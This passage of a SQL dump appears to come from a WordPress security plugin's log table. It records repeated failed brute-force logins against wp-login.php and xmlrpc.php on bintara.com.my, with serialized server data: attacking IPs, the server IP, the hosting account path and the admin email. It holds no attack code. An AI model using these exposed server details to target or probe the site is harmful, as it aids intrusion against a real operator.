19:05:03',18256280,19557024,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(23914,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"37714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6LWr1rBLb0GV3O7mS@ZAAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568574299.1542\";s:12:\"REQUEST_TIME\";s:10:\"1568574299\";}}','notice','2019-09-15 19:05:00','2019-09-15 19:04:59',17737072,19227960,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2'),(23913,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"57166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6Ii71rBLb0GV3O7mS@GAAAAE4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568573580.0247\";s:12:\"REQUEST_TIME\";s:10:\"1568573580\";}}','notice','2019-09-15 18:53:01','2019-09-15 18:53:00',18252824,19551176,'https://bintara.com.my/xmlrpc.php',1,0,'209.15.37.34'),(23912,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"209.15.37.34\";s:11:\"REMOTE_PORT\";s:5:\"56678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6IiOesTgPVjZVPWmsl3wAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568573576.909\";s:12:\"REQUEST_TIME\";s:10:\"1568573576\";}}','notice','2019-09-15 18:52:58','2019-09-15 18:52:57',17739704,19230544,'https://bintara.com.my/wp-login.php',1,0,'209.15.37.34'),(23911,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"57562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6F6d7nxogXZmwWoWHDvwAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568572905.7794\";s:12:\"REQUEST_TIME\";s:10:\"1568572905\";}}','notice','2019-09-15 18:41:47','2019-09-15 18:41:46',18256256,19555304,'https://bintara.com.my/xmlrpc.php',1,0,'100.26.104.241'),(23910,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"100.26.104.241\";s:11:\"REMOTE_PORT\";s:5:\"56996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6F5mCCaIOMm5l5jJEiMAAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568572902.7868\";s:12:\"REQUEST_TIME\";s:10:\"1568572902\";}}','notice','2019-09-15 18:41:44','2019-09-15 18:41:43',17738704,19229968,'https://bintara.com.my/wp-login.php',1,0,'100.26.104.241'),(23909,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"40334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6DEd7nxogXZmwWoWHCZgAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568572177.2075\";s:12:\"REQUEST_TIME\";s:10:\"1568572177\";}}','notice','2019-09-15 18:29:39','2019-09-15 18:29:37',18255672,19555864,'https://bintara.com.my/xmlrpc.php',1,0,'119.28.180.62'),(23908,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"39964\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6DDt7nxogXZmwWoWHCZQAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568572174.5528\";s:12:\"REQUEST_TIME\";s:10:\"1568572174\";}}','notice','2019-09-15 18:29:36','2019-09-15 18:29:35',17739344,19230272,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(23907,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"49486\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6AeOesTgPVjZVPWmskfAAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568571512.9033\";s:12:\"REQUEST_TIME\";s:10:\"1568571512\";}}','notice','2019-09-15 18:18:34','2019-09-15 18:18:33',18255368,19554128,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(23906,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"48444\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6AdmCCaIOMm5l5jJEh7AAAARQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568571510.7567\";s:12:\"REQUEST_TIME\";s:10:\"1568571510\";}}','notice','2019-09-15 18:18:32','2019-09-15 